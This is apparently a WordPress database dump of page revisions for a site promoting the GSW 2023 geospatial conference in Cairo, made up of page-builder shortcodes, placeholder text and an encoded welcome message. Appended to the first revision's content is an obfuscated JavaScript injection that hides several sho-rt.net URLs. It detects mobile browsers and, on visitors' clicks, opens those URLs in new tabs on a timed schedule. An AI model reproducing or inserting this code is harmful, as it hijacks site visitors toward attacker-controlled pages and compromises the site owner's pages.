vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQ2JyJTJGJTNFQ2xpY2slMjBlZGl0JTIwYnV0dG9uJTIwdG8lMjBjaGFuZ2UlMjB0aGlzJTIwaHRtbCUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:49:14','2022-10-05 17:49:14','',2167,'https://gsw2023.com/?p=2292',0,'revision','',0),
(2293,1,'2022-10-05 17:51:41','2022-10-05 17:51:41','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" 